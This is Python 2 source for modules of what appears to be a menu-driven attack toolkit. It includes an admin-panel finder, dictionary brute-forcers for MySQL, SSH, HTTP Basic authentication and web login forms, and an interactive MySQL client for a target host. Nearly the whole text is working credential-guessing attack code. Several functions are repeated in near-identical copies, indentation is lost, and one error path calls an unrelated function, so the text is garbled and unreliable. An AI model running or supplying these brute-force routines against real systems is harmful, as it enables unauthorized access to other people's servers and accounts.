Errors.Errors(event=sys.exc_info(), info=defaulthost+":"+defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=False)
LFDconsole(0)
def adminfinder(run):
try:
global defaulthost,defaultport,defaultdicc
if run!=1:
actions=raw_input(d.prompt("web/cpfinder"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
adminfinder(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
adminfinder(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
with open(defaultdicc,'r') as dirt:
results=""
resultn=""
for patch in dirt:
patch=patch.replace("\n","")
patch = "/" + patch
connection = httplib.HTTPConnection(defaulthost,defaultport)
connection.request("GET",patch)
response = connection.getresponse()
if response.status == 200 or response.status == 301:
print " ["+colors[2]+"+"+colors[0]+"] Response "+patch
results="-["+colors[2]+"*"+colors[0]+"]"+patch+"\n"+results
resultn=patch+","+resultn
else:
print " ["+colors[4]+"!"+colors[0]+"] Checking..."+colors[0]+patch
if results != "":
print "\n"+results
log=open('core/logs/logsAdminFinder.log','a')
log.write('\n ===================================== ')
log.write('\n Module : Admin Finder')
log.write('\n Data : '+time.strftime('%c'))
log.write('\n target : '+defaulthost)
log.write('\n port : '+defaultport)
log.write('\n found : '+resultn)
log.close()
else:
print "\n ["+colors[1]+"-"+colors[0]+"] Not Found CP\n"
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
adminfinder(0)
def adminfinder(run):
try:
global defaulthost, defaultport, defaultdicc
if run != 1:
actions = raw_input(d.prompt("web/cpfinder"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("table", "no", "Dictionary", defaultdicc)
d.space()
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set table":
defaultdicc = ping.update(defaultport, actions, "table")
d.change("table", defaultdicc)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading_file()
with open(defaultdicc, 'r') as dirt:
results = ""
resultn = ""
for patch in dirt:
patch = patch.replace("\n", "")
patch = "/" + patch
connection = httplib.HTTPConnection(
defaulthost, defaultport)
connection.request("GET", patch)
response = connection.getresponse()
if response.status == 200 or response.status == 301:
print " " + Suf + " Response " + patch
results = "-" + Suf + " " + patch + "\n" + results
resultn = patch + "," + resultn
else:
print " " + Alr + " Checking..." + colors[
0] + patch
if results != "":
print "\n" + results
ping.savefive("Admin Finder", defaulthost,
defaultport, results)
else:
print "\n " + Nrs + " Not Results :(.\n"
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
adminfinder(0)
def adminfinder(run):
try:
global defaulthost, defaultport, defaultdicc
if run != 1:
actions = raw_input(d.prompt("web/cpfinder"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("table", "no", "Ditionary", defaultdicc)
d.space()
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set table":
defaultdicc = ping.update(defaultport, actions, "table")
d.change("table", defaultdicc)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading_file()
with open(defaultdicc, "r") as dirt:
results = ""
resultn = ""
for patch in dirt:
patch = patch.replace("\n", "")
patch = "/" + patch
connection = httplib.HTTPConnection(defaulthost, defaultport)
connection.request("GET", patch)
response = connection.getresponse()
if response.status == 200 or response.status == 301:
print " " + Suf + " Response " + patch
results = "-" + Suf + " " + patch + "\n" + results
resultn = patch + "," + resultn
else:
print " " + Alr + " Checking..." + colors[0] + patch
if results != "":
print "\n" + results
ping.savefive("Admin Finder", defaulthost, defaultport, results)
else:
print "\n " + Nrs + " Not Results :(.\n"
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
adminfinder(0)
def btsql(run):
try:
global defaulthost, defaultport, defaultuser, defaultdicc
if run != 1:
actions = raw_input(d.prompt("bt/sql"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
d.space()
btsql(0)
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdicc = ping.update(defaultdicc, actions, "dict_1")
d.change("dict_1", defaultdicc)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading_file()
try:
with open(defaultdicc, 'r') as passs:
for ps in passs:
ps = ps.replace("\n", "")
try:
MySQLdb.connect(
defaulthost, defaultuser, ps, '')
if True:
ping.save("BruteForceSQL",
defaulthost, defaultport,
defaultuser, ps)
d.Success(defaultuser, ps)
return 1
except:
print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
btsql(0)
def btsql(run):
try:
global defaulthost,defaultport,defaultuser,defaultdicc
if run!=1:
actions=raw_input(d.prompt("bt/sql"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("user","yes","Username",defaultuser)
d.descrip("dict_1","yes","Dictionary pass",defaultdicc)
d.space()
btsql(0)
elif actions[0:10] == "set target":
defaulthost=defaulthost.replace("http://", "")
defaulthost=ping.update(defaulthost,actions,"target")
d.change("target",defaulthost)
elif actions[0:8] == "set port":
defaultport=ping.update(defaultport,actions,"port")
d.change("port",defaultport)
elif actions[0:8] == "set user":
defaultuser=ping.update(defaultuser,actions,"user")
d.change("user",defaultuser)
elif actions[0:10] == "set dict_1":
defaultdicc=ping.update(defaultdicc,actions,"dict_1")
d.change("dict_1",defaultdicc)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
d.loading_file()
try:
with open(defaultdicc,'r') as passs:
for ps in passs:
ps=ps.replace("\n","")
try:
MySQLdb.connect(defaulthost,defaultuser,ps,'')
if True:
ping.save("BruteForceSQL",defaulthost,defaultport,defaultuser,ps)
d.Success(defaultuser,ps)
return 1
except:
print " "+Alr+" Checking ("+defaultuser+"="+ps+")"
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
btsql(0)
def httpformbasebruteforce(run):
try:
global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont
if run != 1:
actions = raw_input(d.prompt("web/formbt"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("patch", "yes", "Folder or dir", defaultpach)
d.descrip("para_1", "yes", "Parameter 1", defaultdat1)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("para_2", "yes", "Parameter 2", defaultdat2)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
d.descrip("method", "yes", "POST or GET", defaultmeth)
d.descrip("condit", "yes", "[if!=]No Logged", defaultcont)
print ""
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set patch":
defaultpach = ping.update(defaultpach, actions, "patch")
d.change("patch", defaultpach)
elif actions[0:10] == "set condit":
defaultcont = ping.update(defaultcont, actions, "condit")
d.change("condit", defaultcont)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
d.change("dict_1", defaultdic2)
elif actions[0:10] == "set para_1":
defaultdat1 = ping.update(defaultdat1, actions, "para_1")
d.change("para_1", defaultdat1)
elif actions[0:10] == "set para_2":
defaultdat2 = ping.update(defaultdat2, actions, "para_2")
d.change("para_2", defaultdat2)
elif actions[0:10] == "set method":
defaultmeth = ping.update(defaultmeth, actions, "method")
d.change("method", defaultmeth)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading_file()
try:
with open(defaultdic2, "r") as passs:
for ps in passs:
ps = ps.replace("\n", "")
params = urllib.urlencode({defaultdat1: defaultuser, defaultdat2: ps})
header = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
conn = httplib.HTTPConnection(defaulthost, defaultport)
conn.request(defaultmeth, defaultpach, params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(defaultcont) <= 0:
ping.savefour(
"BruteForceFormBase",
defaulthost,
defaultport,
defaultpach,
defaultmeth,
defaultdat1,
defaultdat2,
defaultuser,
ps,
)
print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + ps + "]\n"
httpformbasebruteforce(0)
else:
print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + ps + ")"
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
httpformbasebruteforce(0)
def btssh(run):
try:
global defaulthost, defaultport, defaultuser, defaultdicc
if run != 1:
actions = raw_input(d.prompt("bt/ssh"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc)
print ""
btssh(0)
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target", defaulthost)
btssh(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port", defaultport)
btssh(0)
elif actions[0:8] == "set user":
defaultuser = actions[9:]
d.change("user", defaultuser)
btssh(0)
elif actions[0:10] == "set dict_1":
defaultdicc = actions[11:]
d.change("dict_1", defaultdicc)
btssh(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading()
try:
with open(defaultdicc, 'r') as passs:
for ps in passs:
ps = ps.replace("\n", "")
try:
connect = pxssh.pxssh()
connect.login(defaulthost, defaultuser,
ps)
if True:
ping.save("BruteForceSSH",
defaulthost, defaultport,
defaultuser, ps)
print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n"
return 1
except:
print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
except:
d.filenot(defaultdicc)
btpop3(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
btssh(0)
def httpbt(run):
try:
global defaulthost, defaultport, defaultpach, defaultdic1, defaultdic2
if run != 1:
actions = raw_input(d.prompt("web/httpbt"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("patch", "yes", "Folder or dir", defaultpach)
d.descrip("dict_1", "yes", "Dictionary user", defaultdic1)
d.descrip("dict_2", "yes", "Dictionary pass", defaultdic2)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target", defaulthost)
httpbt(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port", defaultport)
httpbt(0)
elif actions[0:9] == "set patch":
defaultpach = actions[10:]
d.change("patch", defaultpach)
httpbt(0)
elif actions[0:10] == "set dict_1":
defaultdic1 = actions[11:]
d.change("dict_1", defaultdic1)
httpbt(0)
elif actions[0:10] == "set dict_2":
defaultdic2 = actions[11:]
d.change("dict_1", defaultdic2)
httpbt(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
red.connect((defaulthost, int(defaultport)))
try:
d.loading()
try:
with open(defaultdic1, 'r') as user:
for us in user:
try:
with open(defaultdic2, 'r') as passs:
for ps in passs:
us = us.replace("\n", "")
ps = ps.replace("\n", "")
red.send("GET " + defaultpach +
" HTTP/1.1\r\n")
red.send("HOST: " +
defaulthost + "\r\n")
red.send(
"Authorization:Basic " +
base64.b64encode(us + ":" +
ps) +
"\r\n\r\n")
last = red.recv(1000)
if last.find("401") <= 0:
log = open(
'core/logs/logsBruteForce.log',
'a')
log.write(
'\n ===================================== '
)
log.write(
'\n Module : BruteForceHTTP'
)
log.write(
'\n Data : ' +
time.strftime('%c'))
log.write('\n target : ' +
defaulthost)
log.write('\n port : ' +
defaultport)
log.write('\n patch : ' +
defaultpach)
log.write(
'\n Cracked : username : '******' , password : ' + ps)
log.close()
d.sucess(us, ps)
red.close
httpbt(0)
else:
print " [" + colors[4] + "!" + colors[
0] + "] Checking (username="******")(password="******")"
red.close
except:
d.filenot(defaultdic2)
httpbt(0)
except:
d.filenot(defaultdic1)
httpbt(0)
except:
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
httpbt(0)
def cmysql(run):
global defaulthost, defaultport, defaultuser, defaultpass
try:
if run != 1:
actions = raw_input(d.prompt("clt/sql"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("pass", "yes", "Password", defaultpass)
d.space()
cmysql(0)
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:8] == "set pass":
defaultpass = ping.update(defaultpass, actions, "pass")
d.change("pass", defaultpass)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "")
if True:
try:
cmd = "nop"
print "\n " + Hlp + " SQL Client help\n"
print " -------------------------------------------------------------------------------------------------------"
print " |" + colors[6] + "Commd" + colors[0] + " | " + colors[
6
] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[
0
] + " |"
print " -------------------------------------------------------------------------------------------------------"
print " |show databases | list databases | show databases |"
print " |use | select database | use user_table |"
print " |show tables | list tables | show tables |"
print " |create database | create databases| create database USERS | "
print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
print " |drop database | drop databases | drop database USERS | "
print " |drop table | drop tables | drop table EMAIL | "
print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
print " |update | update data | update EMAILS set name='Willy' where id=1 | "
print " |select | select data | select id, name from EMAILS | "
print " -------------------------------------------------------------------------------------------------------"
print ""
while cmd != "exit":
cmd = raw_input(d.Client_prompt("sql"))
cur = con.cursor()
try:
tor = cur.execute(cmd)
if True:
for x in range(tor):
print cur.fetchone()
except:
print " " + Bad + " No command '" + cmd + "' found"
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
cmysql(0)
def cmysql(run):
global defaulthost,defaultport,defaultuser,defaultpass
try:
if run!=1:
actions=raw_input(d.prompt("clt/sql"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.descrip("user","yes","Username",defaultuser)
d.descrip("pass","yes","Password",defaultpass)
print ""
cmysql(0)
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
cmysql(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
cmysql(0)
elif actions[0:8] == "set user":
defaultuser = actions[9:]
d.change("user",defaultuser)
cmysql(0)
elif actions[0:8] == "set pass":
defaultpass = actions[9:]
d.change("pass",defaultpass)
cmysql(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
con=MySQLdb.connect(defaulthost, defaultuser, defaultpass,"")
if True:
try:
cmd="nop"
print "\n "+Hlp+" SQL Client help\n"
print " -------------------------------------------------------------------------------------------------------"
print " |"+colors[6]+"Commd"+colors[0]+" | "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |"
print " -------------------------------------------------------------------------------------------------------"
print " |show databases | list databases | show databases |"
print " |use | select database | use user_table |"
print " |show tables | list tables | show tables |"
print " |create database | create databases| create database USERS | "
print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
print " |drop database | drop databases | drop database USERS | "
print " |drop table | drop tables | drop table EMAIL | "
print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
print " |update | update data | update EMAILS set name='Willy' where id=1 | "
print " |select | select data | select id, name from EMAILS | "
print " -------------------------------------------------------------------------------------------------------"
print ""
while(cmd!="exit"):
cmd = raw_input(colors[1]+" CLT~"+colors[3]+"sql/> "+colors[0])
cur=con.cursor()
try:
tor=cur.execute(cmd)
if True:
for x in range(tor):
print cur.fetchone()
except:
print " ["+colors[1]+"-"+colors[0]+"] Error: command"
except(KeyboardInterrupt):
d.kbi()
except Exception,e:
print(" ["+colors[1]+"-"+colors[0]+"] Timeout.", e)
except:
d.nomatch()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
cmysql(0)
def cmysql(run):
global defaulthost, defaultport, defaultuser, defaultpass
try:
if run != 1:
actions = raw_input(d.prompt("clt/sql"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("pass", "yes", "Password", defaultpass)
print ""
cmysql(0)
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target", defaulthost)
cmysql(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port", defaultport)
cmysql(0)
elif actions[0:8] == "set user":
defaultuser = actions[9:]
d.change("user", defaultuser)
cmysql(0)
elif actions[0:8] == "set pass":
defaultpass = actions[9:]
d.change("pass", defaultpass)
cmysql(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
con = MySQLdb.connect(defaulthost, defaultuser,
defaultpass, "")
if True:
try:
cmd = "nop"
print "\n " + Hlp + " SQL Client help\n"
print " -------------------------------------------------------------------------------------------------------"
print " |" + colors[6] + "Commd" + colors[
0] + " | " + colors[
6] + "Description" + colors[
0] + " | " + colors[
6] + "Examples" + colors[
0] + " |"
print " -------------------------------------------------------------------------------------------------------"
print " |show databases | list databases | show databases |"
print " |use | select database | use user_table |"
print " |show tables | list tables | show tables |"
print " |create database | create databases| create database USERS | "
print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
print " |drop database | drop databases | drop database USERS | "
print " |drop table | drop tables | drop table EMAIL | "
print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
print " |update | update data | update EMAILS set name='Willy' where id=1 | "
print " |select | select data | select id, name from EMAILS | "
print " -------------------------------------------------------------------------------------------------------"
print ""
while (cmd != "exit"):
cmd = raw_input(colors[1] + " CLT~" +
colors[3] + "sql/> " +
colors[0])
cur = con.cursor()
try:
tor = cur.execute(cmd)
if True:
for x in range(tor):
print cur.fetchone()
except:
print " [" + colors[1] + "-" + colors[
0] + "] Error: command"
except (KeyboardInterrupt):
d.kbi()
except Exception, e:
print(
" [" + colors[1] + "-" + colors[0] +
"] Timeout.", e)
except:
d.nomatch()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
cmysql(0)
def httpformbasebruteforce(run):
try:
global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont
if run != 1:
actions = raw_input(d.prompt("web/formbt"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.descrip("patch", "yes", "Folder or dir", defaultpach)
d.descrip("para_1", "yes", "Parameter 1", defaultdat1)
d.descrip("user", "yes", "Username", defaultuser)
d.descrip("para_2", "yes", "Parameter 2", defaultdat2)
d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
d.descrip("method", "yes", "POST or GET", defaultmeth)
d.descrip("condit", "yes", "[if!=]No Logged", defaultcont)
print ""
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions[0:9] == "set patch":
defaultpach = ping.update(defaultpach, actions, "patch")
d.change("patch", defaultpach)
elif actions[0:10] == "set condit":
defaultcont = ping.update(defaultcont, actions, "condit")
d.change("condit", defaultcont)
elif actions[0:8] == "set user":
defaultuser = ping.update(defaultuser, actions, "user")
d.change("user", defaultuser)
elif actions[0:10] == "set dict_1":
defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
d.change("dict_1", defaultdic2)
elif actions[0:10] == "set para_1":
defaultdat1 = ping.update(defaultdat1, actions, "para_1")
d.change("para_1", defaultdat1)
elif actions[0:10] == "set para_2":
defaultdat2 = ping.update(defaultdat2, actions, "para_2")
d.change("para_2", defaultdat2)
elif actions[0:10] == "set method":
defaultmeth = ping.update(defaultmeth, actions, "method")
d.change("method", defaultmeth)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
d.loading_file()
try:
with open(defaultdic2, 'r') as passs:
for ps in passs:
ps = ps.replace("\n", "")
params = urllib.urlencode({
defaultdat1: defaultuser,
defaultdat2: ps
})
header = {
"Content-type":
"application/x-www-form-urlencoded",
"Accept": "text/plain"
}
conn = httplib.HTTPConnection(
defaulthost, defaultport)
conn.request(defaultmeth, defaultpach,
params, header)
response = conn.getresponse()
ver_source = response.read()
if ver_source.find(defaultcont) <= 0:
ping.savefour("BruteForceFormBase",
defaulthost, defaultport,
defaultpach, defaultmeth,
defaultdat1, defaultdat2,
defaultuser, ps)
print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + ps + "]\n"
httpformbasebruteforce(0)
else:
print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + ps + ")"
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaultdic2)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
httpformbasebruteforce(0)
